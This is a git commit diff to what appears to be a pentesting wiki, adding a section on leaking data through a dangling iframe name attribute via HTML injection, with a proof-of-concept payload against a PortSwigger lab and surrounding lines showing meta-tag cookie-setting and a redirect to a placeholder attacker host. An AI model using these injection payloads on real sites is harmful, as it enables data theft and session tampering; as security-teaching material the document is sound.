GitBook: [#3307] No subject
This commit is contained in:
parent
b1dfcc0701
commit
48b89e1c52
@ -221,6 +221,21 @@ Notice that a **child document can view and set location property for parent, ev
|
||||
|
||||
This can be mitigated with something like: _**sandbox=’ allow-scripts allow-top-navigation’**_
|
||||
|
||||
An iframe can also be abused to leak sensitive information from a different page **using the iframe name attribute**. This is because you can create an iframe that iframes itself abusing the HTML injection that makes the **sensitive info appear inside the iframe name attribute** and then access that name from the initial iframe and leak it.
|
||||
|
||||
```html
|
||||
<script>
|
||||
function cspBypass(win) {
|
||||
win[0].location = 'about:blank';
|
||||
setTimeout(()=>alert(win[0].name), 500);
|
||||
}
|
||||
</script>
|
||||
|
||||
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
|
||||
```
|
||||
|
||||
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
|
||||
|
||||
### \<meta abuse
|
||||
|
||||
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
|
||||
|
Loading…
Reference in New Issue
Block a user